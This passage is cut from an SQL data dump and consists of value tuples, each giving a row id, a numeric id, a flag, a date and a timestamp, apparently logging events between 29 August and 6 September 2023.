06:39:24'),(83854,5080,1,'2023-08-29','2023-08-29 07:07:34'),(83855,80,1,'2023-08-29','2023-08-29 08:44:43'),(83856,3004,1,'2023-08-29','2023-08-29 09:27:50'),(83857,80,1,'2023-08-29','2023-08-29 09:28:15'),(83858,3004,1,'2023-08-29','2023-08-29 09:28:43'),(83859,470,1,'2023-08-29','2023-08-29 09:46:45'),(83860,1602,1,'2023-08-29','2023-08-29 09:47:50'),(83861,470,1,'2023-08-29','2023-08-29 09:54:10'),(83862,4960,1,'2023-08-29','2023-08-29 10:06:28'),(83863,4911,1,'2023-08-29','2023-08-29 10:52:40'),(83864,4551,1,'2023-08-29','2023-08-29 10:58:32'),(83865,473,1,'2023-08-29','2023-08-29 11:07:35'),(83866,487,1,'2023-08-29','2023-08-29 11:07:35'),(83867,4436,1,'2023-08-29','2023-08-29 11:15:35'),(83868,2159,1,'2023-08-29','2023-08-29 11:34:49'),(83869,3664,1,'2023-08-29','2023-08-29 11:42:00'),(83870,1582,1,'2023-08-29','2023-08-29 12:08:54'),(83871,5163,1,'2023-08-29','2023-08-29 12:18:16'),(83872,468,1,'2023-08-29','2023-08-29 12:40:32'),(83873,4416,1,'2023-08-29','2023-08-29 12:49:37'),(83874,487,1,'2023-08-29','2023-08-29 13:17:53'),(83875,473,1,'2023-08-29','2023-08-29 13:17:53'),(83876,473,1,'2023-08-29','2023-08-29 13:20:38'),(83877,1870,1,'2023-08-29','2023-08-29 13:20:46'),(83878,1610,1,'2023-08-29','2023-08-29 14:38:26'),(83879,3261,1,'2023-08-29','2023-08-29 14:38:28'),(83880,1600,1,'2023-08-29','2023-08-29 15:16:24'),(83881,72,1,'2023-08-29','2023-08-29 15:42:27'),(83882,4238,1,'2023-08-29','2023-08-29 16:15:05'),(83883,4960,1,'2023-08-29','2023-08-29 17:23:51'),(83884,3102,1,'2023-08-29','2023-08-29 17:54:07'),(83885,3691,1,'2023-08-29','2023-08-29 19:46:25'),(83886,4440,1,'2023-08-29','2023-08-29 20:31:37'),(83887,4911,1,'2023-08-29','2023-08-29 21:25:20'),(83888,4412,1,'2023-08-29','2023-08-29 22:18:16'),(83889,4911,1,'2023-08-29','2023-08-29 22:24:59'),(83890,4977,1,'2023-08-29','2023-08-29 23:00:45'),(83891,1594,1,'2023-08-29','2023-08-29 23:13:02'),(83892,1774,1,'2023-08-29','2023-08-29 23:17:18'),(83893,1594,1,'2023-08-29','2023-08-29 23:47:05'),(83894,3034,1,'2023-08-30','2023-08-30 00:09:58'),(83895,4960,1,'2023-08-30','2023-08-30 00:55:46'),(83896,5046,1,'2023-08-30','2023-08-30 01:05:10'),(83897,4888,1,'2023-08-30','2023-08-30 01:19:14'),(83898,2293,1,'2023-08-30','2023-08-30 01:31:27'),(83899,4888,1,'2023-08-30','2023-08-30 02:13:18'),(83900,2809,1,'2023-08-30','2023-08-30 02:21:28'),(83901,3691,1,'2023-08-30','2023-08-30 02:53:43'),(83902,3691,1,'2023-08-30','2023-08-30 03:16:11'),(83903,1582,1,'2023-08-30','2023-08-30 03:21:29'),(83904,2775,1,'2023-08-30','2023-08-30 03:41:43'),(83905,4977,1,'2023-08-30','2023-08-30 03:46:17'),(83906,4412,1,'2023-08-30','2023-08-30 04:06:28'),(83907,1582,1,'2023-08-30','2023-08-30 04:16:16'),(83908,4657,1,'2023-08-30','2023-08-30 04:31:28'),(83909,2769,1,'2023-08-30','2023-08-30 06:40:47'),(83910,4412,1,'2023-08-30','2023-08-30 07:20:57'),(83911,4744,1,'2023-08-30','2023-08-30 07:25:45'),(83912,1600,1,'2023-08-30','2023-08-30 08:04:31'),(83913,4966,1,'2023-08-30','2023-08-30 08:05:03'),(83914,5356,1,'2023-08-30','2023-08-30 08:26:01'),(83915,91,1,'2023-08-30','2023-08-30 11:15:11'),(83916,4424,1,'2023-08-30','2023-08-30 11:33:11'),(83917,68,1,'2023-08-30','2023-08-30 11:34:11'),(83918,4930,1,'2023-08-30','2023-08-30 11:34:42'),(83919,4938,1,'2023-08-30','2023-08-30 11:34:52'),(83920,4930,1,'2023-08-30','2023-08-30 11:35:06'),(83921,68,1,'2023-08-30','2023-08-30 11:35:12'),(83922,4424,1,'2023-08-30','2023-08-30 11:35:13'),(83923,4744,1,'2023-08-30','2023-08-30 12:47:36'),(83924,4963,1,'2023-08-30','2023-08-30 14:02:05'),(83925,4963,1,'2023-08-30','2023-08-30 14:03:49'),(83926,5276,1,'2023-08-30','2023-08-30 15:31:22'),(83927,4412,1,'2023-08-30','2023-08-30 15:41:45'),(83928,5359,1,'2023-08-30','2023-08-30 16:15:49'),(83929,4657,1,'2023-08-30','2023-08-30 16:37:35'),(83930,2411,1,'2023-08-30','2023-08-30 16:37:36'),(83931,4657,1,'2023-08-30','2023-08-30 16:37:37'),(83932,1770,1,'2023-08-30','2023-08-30 17:04:36'),(83933,5359,1,'2023-08-30','2023-08-30 17:41:54'),(83934,4960,1,'2023-08-30','2023-08-30 18:06:41'),(83935,68,1,'2023-08-30','2023-08-30 18:06:55'),(83936,5276,1,'2023-08-30','2023-08-30 18:07:33'),(83937,4660,1,'2023-08-30','2023-08-30 18:56:32'),(83938,4238,1,'2023-08-30','2023-08-30 20:13:00'),(83939,4950,1,'2023-08-30','2023-08-30 20:20:58'),(83940,5353,1,'2023-08-30','2023-08-30 20:26:10'),(83941,5353,1,'2023-08-30','2023-08-30 20:26:11'),(83942,4950,1,'2023-08-30','2023-08-30 20:37:07'),(83943,4960,1,'2023-08-30','2023-08-30 21:30:09'),(83944,4960,1,'2023-08-30','2023-08-30 21:42:09'),(83945,4648,1,'2023-08-31','2023-08-31 00:39:35'),(83946,5356,1,'2023-08-31','2023-08-31 01:24:34'),(83947,5356,1,'2023-08-31','2023-08-31 01:24:36'),(83948,5101,1,'2023-08-31','2023-08-31 01:47:37'),(83949,3781,1,'2023-08-31','2023-08-31 01:54:36'),(83950,3027,1,'2023-08-31','2023-08-31 02:31:45'),(83951,1582,1,'2023-08-31','2023-08-31 02:32:46'),(83952,68,1,'2023-08-31','2023-08-31 02:37:20'),(83953,4612,1,'2023-08-31','2023-08-31 03:31:36'),(83954,1582,1,'2023-08-31','2023-08-31 03:40:05'),(83955,4612,1,'2023-08-31','2023-08-31 04:28:42'),(83956,481,1,'2023-08-31','2023-08-31 05:11:31'),(83957,4700,1,'2023-08-31','2023-08-31 06:35:07'),(83958,3034,1,'2023-08-31','2023-08-31 06:57:51'),(83959,4977,1,'2023-08-31','2023-08-31 07:42:51'),(83960,4874,1,'2023-08-31','2023-08-31 07:51:16'),(83961,3107,1,'2023-08-31','2023-08-31 08:02:49'),(83962,1608,1,'2023-08-31','2023-08-31 08:13:08'),(83963,4966,1,'2023-08-31','2023-08-31 09:20:22'),(83964,1766,1,'2023-08-31','2023-08-31 09:26:04'),(83965,1870,1,'2023-08-31','2023-08-31 09:54:26'),(83966,473,1,'2023-08-31','2023-08-31 09:54:29'),(83967,4412,1,'2023-08-31','2023-08-31 10:02:25'),(83968,1722,1,'2023-08-31','2023-08-31 10:16:36'),(83969,4657,1,'2023-08-31','2023-08-31 10:42:53'),(83970,4412,1,'2023-08-31','2023-08-31 11:02:02'),(83971,4412,1,'2023-08-31','2023-08-31 11:07:36'),(83972,4911,1,'2023-08-31','2023-08-31 11:15:31'),(83973,68,1,'2023-08-31','2023-08-31 11:16:04'),(83974,4911,1,'2023-08-31','2023-08-31 11:16:27'),(83975,5353,1,'2023-08-31','2023-08-31 11:16:36'),(83976,4648,1,'2023-08-31','2023-08-31 12:01:36'),(83977,4660,1,'2023-08-31','2023-08-31 12:12:52'),(83978,1877,1,'2023-08-31','2023-08-31 13:24:55'),(83979,473,1,'2023-08-31','2023-08-31 13:24:55'),(83980,4416,1,'2023-08-31','2023-08-31 13:31:39'),(83981,2809,1,'2023-08-31','2023-08-31 13:41:40'),(83982,4741,1,'2023-08-31','2023-08-31 13:41:50'),(83983,5276,1,'2023-08-31','2023-08-31 13:41:51'),(83984,4436,1,'2023-08-31','2023-08-31 13:46:37'),(83985,5356,1,'2023-08-31','2023-08-31 13:52:54'),(83986,4950,1,'2023-08-31','2023-08-31 14:13:06'),(83987,4657,1,'2023-08-31','2023-08-31 14:15:25'),(83988,2809,1,'2023-08-31','2023-08-31 14:16:37'),(83989,4436,1,'2023-08-31','2023-08-31 14:16:39'),(83990,4977,1,'2023-08-31','2023-08-31 14:26:41'),(83991,4744,1,'2023-08-31','2023-08-31 14:49:09'),(83992,1614,1,'2023-08-31','2023-08-31 14:56:39'),(83993,5337,1,'2023-08-31','2023-08-31 15:16:37'),(83994,1586,1,'2023-08-31','2023-08-31 15:19:01'),(83995,1612,1,'2023-08-31','2023-08-31 15:41:39'),(83996,4329,1,'2023-08-31','2023-08-31 17:13:33'),(83997,80,1,'2023-08-31','2023-08-31 18:55:48'),(83998,1602,1,'2023-08-31','2023-08-31 19:08:20'),(83999,4911,1,'2023-08-31','2023-08-31 19:14:17'),(84000,5163,1,'2023-08-31','2023-08-31 19:35:16'),(84001,4977,1,'2023-08-31','2023-08-31 20:06:58'),(84002,3313,1,'2023-08-31','2023-08-31 21:31:44'),(84003,5353,1,'2023-08-31','2023-08-31 23:06:58'),(84004,4911,1,'2023-08-31','2023-08-31 23:22:26'),(84005,4960,1,'2023-08-31','2023-08-31 23:43:44'),(84006,4977,1,'2023-08-31','2023-08-31 23:46:44'),(84007,4960,1,'2023-09-01','2023-09-01 00:02:41'),(84008,5353,1,'2023-09-01','2023-09-01 01:43:00'),(84009,1608,1,'2023-09-01','2023-09-01 01:43:04'),(84010,4938,1,'2023-09-01','2023-09-01 01:45:47'),(84011,5101,1,'2023-09-01','2023-09-01 01:46:20'),(84012,1600,1,'2023-09-01','2023-09-01 01:46:30'),(84013,1544,1,'2023-09-01','2023-09-01 02:01:49'),(84014,1596,1,'2023-09-01','2023-09-01 02:13:58'),(84015,5289,1,'2023-09-01','2023-09-01 02:27:14'),(84016,4348,1,'2023-09-01','2023-09-01 03:44:53'),(84017,4348,1,'2023-09-01','2023-09-01 04:10:43'),(84018,1600,1,'2023-09-01','2023-09-01 06:07:56'),(84019,4963,1,'2023-09-01','2023-09-01 09:30:04'),(84020,3790,1,'2023-09-01','2023-09-01 09:45:26'),(84021,473,1,'2023-09-01','2023-09-01 11:53:28'),(84022,487,1,'2023-09-01','2023-09-01 11:53:33'),(84023,1870,1,'2023-09-01','2023-09-01 11:53:41'),(84024,473,1,'2023-09-01','2023-09-01 11:53:41'),(84025,487,1,'2023-09-01','2023-09-01 11:53:54'),(84026,473,1,'2023-09-01','2023-09-01 11:53:55'),(84027,3083,1,'2023-09-01','2023-09-01 12:27:28'),(84028,3096,1,'2023-09-01','2023-09-01 14:04:02'),(84029,84,1,'2023-09-01','2023-09-01 14:26:29'),(84030,4412,1,'2023-09-01','2023-09-01 14:27:42'),(84031,1604,1,'2023-09-01','2023-09-01 14:27:43'),(84032,3764,1,'2023-09-01','2023-09-01 14:35:25'),(84033,4960,1,'2023-09-01','2023-09-01 14:47:59'),(84034,5289,1,'2023-09-01','2023-09-01 14:50:59'),(84035,1544,1,'2023-09-01','2023-09-01 15:16:10'),(84036,4911,1,'2023-09-01','2023-09-01 15:31:13'),(84037,3240,1,'2023-09-01','2023-09-01 15:35:51'),(84038,5042,1,'2023-09-01','2023-09-01 16:20:48'),(84039,1544,1,'2023-09-01','2023-09-01 16:26:32'),(84040,1544,1,'2023-09-01','2023-09-01 16:49:38'),(84041,4911,1,'2023-09-01','2023-09-01 17:43:47'),(84042,1610,1,'2023-09-01','2023-09-01 17:49:00'),(84043,1610,1,'2023-09-01','2023-09-01 18:33:57'),(84044,5042,1,'2023-09-01','2023-09-01 18:35:48'),(84045,3691,1,'2023-09-01','2023-09-01 20:12:10'),(84046,1741,1,'2023-09-01','2023-09-01 20:31:51'),(84047,4911,1,'2023-09-01','2023-09-01 21:38:31'),(84048,4911,1,'2023-09-01','2023-09-01 22:35:46'),(84049,3781,1,'2023-09-01','2023-09-01 23:14:27'),(84050,3781,1,'2023-09-01','2023-09-01 23:27:02'),(84051,4966,1,'2023-09-02','2023-09-02 02:03:12'),(84052,1608,1,'2023-09-02','2023-09-02 03:46:20'),(84053,4977,1,'2023-09-02','2023-09-02 03:57:31'),(84054,72,1,'2023-09-02','2023-09-02 04:01:07'),(84055,4520,1,'2023-09-02','2023-09-02 04:01:11'),(84056,4520,1,'2023-09-02','2023-09-02 04:16:10'),(84057,4966,1,'2023-09-02','2023-09-02 04:31:13'),(84058,1600,1,'2023-09-02','2023-09-02 04:38:23'),(84059,3698,1,'2023-09-02','2023-09-02 05:16:16'),(84060,1614,1,'2023-09-02','2023-09-02 05:16:18'),(84061,4648,1,'2023-09-02','2023-09-02 06:08:41'),(84062,4744,1,'2023-09-02','2023-09-02 07:08:41'),(84063,4744,1,'2023-09-02','2023-09-02 07:38:42'),(84064,1592,1,'2023-09-02','2023-09-02 07:50:44'),(84065,2989,1,'2023-09-02','2023-09-02 08:37:35'),(84066,3731,1,'2023-09-02','2023-09-02 08:39:38'),(84067,80,1,'2023-09-02','2023-09-02 08:40:11'),(84068,3731,1,'2023-09-02','2023-09-02 08:43:10'),(84069,4911,1,'2023-09-02','2023-09-02 08:48:43'),(84070,3731,1,'2023-09-02','2023-09-02 08:55:18'),(84071,80,1,'2023-09-02','2023-09-02 08:57:11'),(84072,4457,1,'2023-09-02','2023-09-02 12:58:21'),(84073,3764,1,'2023-09-02','2023-09-02 13:06:17'),(84074,4238,1,'2023-09-02','2023-09-02 13:07:29'),(84075,1604,1,'2023-09-02','2023-09-02 13:40:56'),(84076,3275,1,'2023-09-02','2023-09-02 13:56:41'),(84077,1604,1,'2023-09-02','2023-09-02 14:10:00'),(84078,5125,1,'2023-09-02','2023-09-02 14:14:05'),(84079,5323,1,'2023-09-02','2023-09-02 14:14:28'),(84080,3764,1,'2023-09-02','2023-09-02 15:45:17'),(84081,1608,1,'2023-09-02','2023-09-02 16:00:19'),(84082,3764,1,'2023-09-02','2023-09-02 16:15:16'),(84083,1745,1,'2023-09-02','2023-09-02 16:35:43'),(84084,2309,1,'2023-09-02','2023-09-02 16:55:42'),(84085,4416,1,'2023-09-02','2023-09-02 18:15:17'),(84086,4977,1,'2023-09-02','2023-09-02 18:30:15'),(84087,4960,1,'2023-09-02','2023-09-02 18:44:29'),(84088,4639,1,'2023-09-02','2023-09-02 18:45:16'),(84089,3030,1,'2023-09-02','2023-09-02 18:52:47'),(84090,3087,1,'2023-09-02','2023-09-02 18:53:48'),(84091,1596,1,'2023-09-02','2023-09-02 19:46:55'),(84092,4238,1,'2023-09-02','2023-09-02 21:52:45'),(84093,4977,1,'2023-09-02','2023-09-02 23:01:58'),(84094,1870,1,'2023-09-02','2023-09-02 23:24:50'),(84095,473,1,'2023-09-02','2023-09-02 23:24:50'),(84096,1872,1,'2023-09-02','2023-09-02 23:27:34'),(84097,473,1,'2023-09-02','2023-09-02 23:27:35'),(84098,473,1,'2023-09-02','2023-09-02 23:27:35'),(84099,1872,1,'2023-09-02','2023-09-02 23:27:35'),(84100,473,1,'2023-09-02','2023-09-02 23:27:36'),(84101,1872,1,'2023-09-02','2023-09-02 23:27:36'),(84102,473,1,'2023-09-02','2023-09-02 23:27:36'),(84103,1872,1,'2023-09-02','2023-09-02 23:27:37'),(84104,473,1,'2023-09-02','2023-09-02 23:27:37'),(84105,487,1,'2023-09-02','2023-09-02 23:27:38'),(84106,487,1,'2023-09-02','2023-09-02 23:27:40'),(84107,473,1,'2023-09-02','2023-09-02 23:27:40'),(84108,487,1,'2023-09-02','2023-09-02 23:27:41'),(84109,473,1,'2023-09-02','2023-09-02 23:27:41'),(84110,473,1,'2023-09-02','2023-09-02 23:27:44'),(84111,1872,1,'2023-09-02','2023-09-02 23:27:44'),(84112,487,1,'2023-09-02','2023-09-02 23:27:44'),(84113,473,1,'2023-09-02','2023-09-02 23:27:44'),(84114,487,1,'2023-09-02','2023-09-02 23:27:53'),(84115,473,1,'2023-09-02','2023-09-02 23:27:53'),(84116,487,1,'2023-09-02','2023-09-02 23:27:56'),(84117,473,1,'2023-09-02','2023-09-02 23:27:56'),(84118,487,1,'2023-09-02','2023-09-02 23:28:00'),(84119,473,1,'2023-09-02','2023-09-02 23:28:00'),(84120,1872,1,'2023-09-02','2023-09-02 23:28:05'),(84121,473,1,'2023-09-02','2023-09-02 23:28:05'),(84122,1872,1,'2023-09-02','2023-09-02 23:28:22'),(84123,473,1,'2023-09-02','2023-09-02 23:28:22'),(84124,1877,1,'2023-09-02','2023-09-02 23:28:45'),(84125,473,1,'2023-09-02','2023-09-02 23:28:45'),(84126,1614,1,'2023-09-03','2023-09-03 00:04:58'),(84127,3664,1,'2023-09-03','2023-09-03 01:09:19'),(84128,472,1,'2023-09-03','2023-09-03 02:57:21'),(84129,1596,1,'2023-09-03','2023-09-03 02:57:22'),(84130,1612,1,'2023-09-03','2023-09-03 03:14:33'),(84131,2965,1,'2023-09-03','2023-09-03 03:23:36'),(84132,4776,1,'2023-09-03','2023-09-03 03:31:48'),(84133,1612,1,'2023-09-03','2023-09-03 03:49:41'),(84134,472,1,'2023-09-03','2023-09-03 04:10:54'),(84135,2965,1,'2023-09-03','2023-09-03 04:21:27'),(84136,1600,1,'2023-09-03','2023-09-03 04:21:46'),(84137,4759,1,'2023-09-03','2023-09-03 04:47:40'),(84138,472,1,'2023-09-03','2023-09-03 04:55:54'),(84139,4776,1,'2023-09-03','2023-09-03 05:27:18'),(84140,4759,1,'2023-09-03','2023-09-03 05:32:40'),(84141,5101,1,'2023-09-03','2023-09-03 06:57:22'),(84142,2775,1,'2023-09-03','2023-09-03 12:12:23'),(84143,1594,1,'2023-09-03','2023-09-03 12:28:43'),(84144,4768,1,'2023-09-03','2023-09-03 14:09:50'),(84145,2775,1,'2023-09-03','2023-09-03 14:18:19'),(84146,3240,1,'2023-09-03','2023-09-03 14:32:20'),(84147,4768,1,'2023-09-03','2023-09-03 14:32:22'),(84148,2411,1,'2023-09-03','2023-09-03 14:33:47'),(84149,3764,1,'2023-09-03','2023-09-03 15:02:12'),(84150,3764,1,'2023-09-03','2023-09-03 15:03:18'),(84151,3698,1,'2023-09-03','2023-09-03 15:17:23'),(84152,3698,1,'2023-09-03','2023-09-03 16:02:21'),(84153,4977,1,'2023-09-03','2023-09-03 16:30:02'),(84154,2965,1,'2023-09-03','2023-09-03 16:38:14'),(84155,1608,1,'2023-09-03','2023-09-03 16:47:22'),(84156,1594,1,'2023-09-03','2023-09-03 18:41:52'),(84157,5289,1,'2023-09-03','2023-09-03 18:42:52'),(84158,4911,1,'2023-09-03','2023-09-03 18:45:33'),(84159,91,1,'2023-09-03','2023-09-03 19:19:33'),(84160,5157,1,'2023-09-03','2023-09-03 19:19:50'),(84161,5157,1,'2023-09-03','2023-09-03 19:19:51'),(84162,91,1,'2023-09-03','2023-09-03 19:19:58'),(84163,3764,1,'2023-09-03','2023-09-03 19:20:08'),(84164,1600,1,'2023-09-03','2023-09-03 19:27:56'),(84165,3764,1,'2023-09-03','2023-09-03 19:40:09'),(84166,1594,1,'2023-09-03','2023-09-03 20:11:55'),(84167,1582,1,'2023-09-03','2023-09-03 20:24:41'),(84168,2411,1,'2023-09-03','2023-09-03 20:49:17'),(84169,2419,1,'2023-09-03','2023-09-03 20:49:48'),(84170,76,1,'2023-09-03','2023-09-03 20:50:13'),(84171,68,1,'2023-09-03','2023-09-03 20:50:52'),(84172,76,1,'2023-09-03','2023-09-03 20:51:03'),(84173,2419,1,'2023-09-03','2023-09-03 20:51:04'),(84174,2411,1,'2023-09-03','2023-09-03 20:51:05'),(84175,4391,1,'2023-09-03','2023-09-03 23:11:51'),(84176,84,1,'2023-09-04','2023-09-04 00:21:09'),(84177,4966,1,'2023-09-04','2023-09-04 01:04:55'),(84178,4703,1,'2023-09-04','2023-09-04 01:58:11'),(84179,4950,1,'2023-09-04','2023-09-04 02:02:08'),(84180,1588,1,'2023-09-04','2023-09-04 02:12:45'),(84181,5101,1,'2023-09-04','2023-09-04 02:43:11'),(84182,4703,1,'2023-09-04','2023-09-04 03:28:09'),(84183,468,1,'2023-09-04','2023-09-04 03:37:20'),(84184,1588,1,'2023-09-04','2023-09-04 03:52:47'),(84185,5042,1,'2023-09-04','2023-09-04 04:13:09'),(84186,468,1,'2023-09-04','2023-09-04 06:29:25'),(84187,473,1,'2023-09-04','2023-09-04 06:34:09'),(84188,1870,1,'2023-09-04','2023-09-04 06:34:13'),(84189,1604,1,'2023-09-04','2023-09-04 07:14:00'),(84190,473,1,'2023-09-04','2023-09-04 07:16:14'),(84191,487,1,'2023-09-04','2023-09-04 07:16:15'),(84192,4911,1,'2023-09-04','2023-09-04 07:46:15'),(84193,1594,1,'2023-09-04','2023-09-04 09:36:16'),(84194,3102,1,'2023-09-04','2023-09-04 09:36:33'),(84195,487,1,'2023-09-04','2023-09-04 10:19:28'),(84196,473,1,'2023-09-04','2023-09-04 10:19:28'),(84197,474,1,'2023-09-04','2023-09-04 10:20:32'),(84198,91,1,'2023-09-04','2023-09-04 10:44:11'),(84199,5157,1,'2023-09-04','2023-09-04 10:44:15'),(84200,1604,1,'2023-09-04','2023-09-04 11:04:03'),(84201,4977,1,'2023-09-04','2023-09-04 11:55:26'),(84202,89,1,'2023-09-04','2023-09-04 12:40:28'),(84203,4960,1,'2023-09-04','2023-09-04 13:13:50'),(84204,4960,1,'2023-09-04','2023-09-04 13:13:54'),(84205,335,1,'2023-09-04','2023-09-04 13:14:43'),(84206,335,1,'2023-09-04','2023-09-04 13:14:47'),(84207,80,1,'2023-09-04','2023-09-04 13:16:09'),(84208,80,1,'2023-09-04','2023-09-04 13:19:28'),(84209,80,1,'2023-09-04','2023-09-04 13:24:11'),(84210,335,1,'2023-09-04','2023-09-04 13:24:12'),(84211,4950,1,'2023-09-04','2023-09-04 13:24:30'),(84212,5259,1,'2023-09-04','2023-09-04 13:54:09'),(84213,4685,1,'2023-09-04','2023-09-04 14:02:30'),(84214,4911,1,'2023-09-04','2023-09-04 14:02:39'),(84215,1612,1,'2023-09-04','2023-09-04 14:09:47'),(84216,4966,1,'2023-09-04','2023-09-04 14:13:44'),(84217,1612,1,'2023-09-04','2023-09-04 14:16:16'),(84218,74,1,'2023-09-04','2023-09-04 14:16:54'),(84219,4911,1,'2023-09-04','2023-09-04 14:24:59'),(84220,4373,1,'2023-09-04','2023-09-04 14:25:01'),(84221,1600,1,'2023-09-04','2023-09-04 14:47:29'),(84222,1596,1,'2023-09-04','2023-09-04 14:49:29'),(84223,4966,1,'2023-09-04','2023-09-04 14:55:04'),(84224,5256,1,'2023-09-04','2023-09-04 15:09:57'),(84225,4685,1,'2023-09-04','2023-09-04 15:32:30'),(84226,4911,1,'2023-09-04','2023-09-04 15:42:28'),(84227,68,1,'2023-09-04','2023-09-04 15:57:25'),(84228,68,1,'2023-09-04','2023-09-04 15:57:42'),(84229,4420,1,'2023-09-04','2023-09-04 16:34:57'),(84230,4420,1,'2023-09-04','2023-09-04 16:44:57'),(84231,2775,1,'2023-09-04','2023-09-04 17:14:55'),(84232,4391,1,'2023-09-04','2023-09-04 17:44:56'),(84233,3781,1,'2023-09-04','2023-09-04 17:46:01'),(84234,1728,1,'2023-09-04','2023-09-04 17:50:21'),(84235,4977,1,'2023-09-04','2023-09-04 17:54:56'),(84236,80,1,'2023-09-04','2023-09-04 17:58:01'),(84237,4420,1,'2023-09-04','2023-09-04 18:40:00'),(84238,1600,1,'2023-09-04','2023-09-04 18:42:59'),(84239,2775,1,'2023-09-04','2023-09-04 19:24:57'),(84240,4944,1,'2023-09-04','2023-09-04 19:57:29'),(84241,4977,1,'2023-09-04','2023-09-04 20:55:18'),(84242,5289,1,'2023-09-04','2023-09-04 20:57:58'),(84243,3263,1,'2023-09-04','2023-09-04 21:04:35'),(84244,486,1,'2023-09-05','2023-09-05 01:04:01'),(84245,2904,1,'2023-09-05','2023-09-05 01:49:00'),(84246,5292,1,'2023-09-05','2023-09-05 01:58:28'),(84247,4977,1,'2023-09-05','2023-09-05 02:01:56'),(84248,4677,1,'2023-09-05','2023-09-05 02:17:32'),(84249,4677,1,'2023-09-05','2023-09-05 02:40:02'),(84250,1872,1,'2023-09-05','2023-09-05 02:43:28'),(84251,5307,1,'2023-09-05','2023-09-05 02:56:23'),(84252,3066,1,'2023-09-05','2023-09-05 02:57:19'),(84253,5307,1,'2023-09-05','2023-09-05 03:16:50'),(84254,5295,1,'2023-09-05','2023-09-05 03:25:01'),(84255,1608,1,'2023-09-05','2023-09-05 03:25:06'),(84256,4685,1,'2023-09-05','2023-09-05 03:47:30'),(84257,5295,1,'2023-09-05','2023-09-05 03:52:42'),(84258,3664,1,'2023-09-05','2023-09-05 03:59:39'),(84259,487,1,'2023-09-05','2023-09-05 04:01:42'),(84260,487,1,'2023-09-05','2023-09-05 04:10:43'),(84261,4911,1,'2023-09-05','2023-09-05 04:11:30'),(84262,5298,1,'2023-09-05','2023-09-05 04:28:42'),(84263,4977,1,'2023-09-05','2023-09-05 04:33:29'),(84264,2904,1,'2023-09-05','2023-09-05 04:37:42'),(84265,4966,1,'2023-09-05','2023-09-05 05:16:42'),(84266,4454,1,'2023-09-05','2023-09-05 05:29:39'),(84267,3706,1,'2023-09-05','2023-09-05 05:32:33'),(84268,1596,1,'2023-09-05','2023-09-05 05:35:05'),(84269,4977,1,'2023-09-05','2023-09-05 05:55:02'),(84270,4802,1,'2023-09-05','2023-09-05 06:01:42'),(84271,5163,1,'2023-09-05','2023-09-05 07:30:39'),(84272,5163,1,'2023-09-05','2023-09-05 07:30:44'),(84273,5163,1,'2023-09-05','2023-09-05 07:35:27'),(84274,4960,1,'2023-09-05','2023-09-05 08:38:23'),(84275,3746,1,'2023-09-05','2023-09-05 09:06:31'),(84276,5304,1,'2023-09-05','2023-09-05 09:22:17'),(84277,5304,1,'2023-09-05','2023-09-05 09:23:19'),(84278,4911,1,'2023-09-05','2023-09-05 09:32:43'),(84279,3746,1,'2023-09-05','2023-09-05 09:51:31'),(84280,487,1,'2023-09-05','2023-09-05 10:19:45'),(84281,473,1,'2023-09-05','2023-09-05 10:19:50'),(84282,89,1,'2023-09-05','2023-09-05 10:47:04'),(84283,89,1,'2023-09-05','2023-09-05 10:47:38'),(84284,1612,1,'2023-09-05','2023-09-05 10:47:49'),(84285,4911,1,'2023-09-05','2023-09-05 11:02:15'),(84286,473,1,'2023-09-05','2023-09-05 11:15:53'),(84287,487,1,'2023-09-05','2023-09-05 11:15:53'),(84288,1598,1,'2023-09-05','2023-09-05 11:21:54'),(84289,5334,1,'2023-09-05','2023-09-05 11:35:07'),(84290,5131,1,'2023-09-05','2023-09-05 11:43:36'),(84291,4976,1,'2023-09-05','2023-09-05 11:55:42'),(84292,3251,1,'2023-09-05','2023-09-05 12:19:30'),(84293,3102,1,'2023-09-05','2023-09-05 13:25:51'),(84294,3102,1,'2023-09-05','2023-09-05 13:26:35'),(84295,1728,1,'2023-09-05','2023-09-05 13:36:28'),(84296,1728,1,'2023-09-05','2023-09-05 13:39:15'),(84297,2457,1,'2023-09-05','2023-09-05 13:58:39'),(84298,4963,1,'2023-09-05','2023-09-05 14:04:05'),(84299,5304,1,'2023-09-05','2023-09-05 14:20:21'),(84300,474,1,'2023-09-05','2023-09-05 14:25:44'),(84301,4697,1,'2023-09-05','2023-09-05 14:43:37'),(84302,3746,1,'2023-09-05','2023-09-05 15:14:34'),(84303,4412,1,'2023-09-05','2023-09-05 15:18:24'),(84304,3664,1,'2023-09-05','2023-09-05 15:28:43'),(84305,4911,1,'2023-09-05','2023-09-05 15:31:45'),(84306,5131,1,'2023-09-05','2023-09-05 15:43:31'),(84307,1606,1,'2023-09-05','2023-09-05 15:51:55'),(84308,5301,1,'2023-09-05','2023-09-05 15:59:20'),(84309,5163,1,'2023-09-05','2023-09-05 16:06:49'),(84310,4911,1,'2023-09-05','2023-09-05 16:21:40'),(84311,474,1,'2023-09-05','2023-09-05 16:22:28'),(84312,4966,1,'2023-09-05','2023-09-05 16:45:34'),(84313,3746,1,'2023-09-05','2023-09-05 16:57:08'),(84314,4944,1,'2023-09-05','2023-09-05 17:07:28'),(84315,4911,1,'2023-09-05','2023-09-05 17:57:50'),(84316,4930,1,'2023-09-05','2023-09-05 17:58:55'),(84317,4911,1,'2023-09-05','2023-09-05 17:59:03'),(84318,3781,1,'2023-09-05','2023-09-05 18:23:44'),(84319,1596,1,'2023-09-05','2023-09-05 18:46:22'),(84320,5080,1,'2023-09-05','2023-09-05 20:12:55'),(84321,1588,1,'2023-09-05','2023-09-05 21:14:41'),(84322,3710,1,'2023-09-05','2023-09-05 22:42:12'),(84323,4960,1,'2023-09-05','2023-09-05 23:29:40'),(84324,4960,1,'2023-09-05','2023-09-05 23:32:31'),(84325,4960,1,'2023-09-05','2023-09-05 23:33:10'),(84326,4960,1,'2023-09-05','2023-09-05 23:34:40'),(84327,4960,1,'2023-09-05','2023-09-05 23:35:19'),(84328,3710,1,'2023-09-06','2023-09-06 00:12:10'),(84329,1734,1,'2023-09-06','2023-09-06 00:50:46'),(84330,1586,1,'2023-09-06','2023-09-06 01:02:01'),(84331,1586,1,'2023-09-06','2023-09-06 01:13:17'),(84332,5122,1,'2023-09-06','2023-09-06 01:47:00'),(84333,4938,1,'2023-09-06','2023-09-06 01:56:38'),(84334,3710,1,'2023-09-06','2023-09-06 02:07:17'),(84335,4674,1,'2023-09-06','2023-09-06 02:10:05'),(84336,1877,1,'2023-09-06','2023-09-06 02:20:44'),(84337,4694,1,'2023-09-06','2023-09-06 02:32:00'),(84338,3006,1,'2023-09-06','2023-09-06 02:33:22'),(84339,4681,1,'2023-09-06','2023-09-06 